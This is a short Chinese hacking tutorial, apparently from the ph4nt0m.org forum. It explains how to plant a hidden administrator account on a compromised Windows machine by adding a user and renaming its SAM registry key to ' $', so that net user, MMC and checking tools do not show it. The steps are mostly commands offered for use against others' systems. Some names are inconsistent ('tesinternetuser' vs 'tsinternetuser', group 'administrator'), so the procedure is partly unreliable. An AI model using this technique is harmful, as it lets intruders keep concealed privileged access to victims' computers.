作者:allyesno 来自:http://www.ph4nt0m.org/
能够实现在 mmc 界面 net user 里面隐形
用工具检查的时候 检查到的第一次建立使用的用户名 查不到隐藏的用户名
有极大的危险性 用此方法改造注册表 造成的危害 本人概不负责
假设肉鸡上已经存在
administrator tesinternetuser
将tesinternetuser 改名为temp
net user tesinternetuser allyesno /add
net localgroup administrator tesinternetuser /add
修改注册表键值
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\tesinternetuser
改为
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\ $
将temp 改回原来名称 tesinternetuser
net user 只会显示 administrator tsinternetuser
mmc不会显示隐藏帐号
用工具检查只会检查出tsinternetuser 存在
登录的时候 用 " $" 登录(注:是空格$)
不完美的地方 用mmc枚举的时候会报告显示 找不到帐号
并且测试过程中发现使用这个帐号的时候 有一些应用程序会报错 例如天网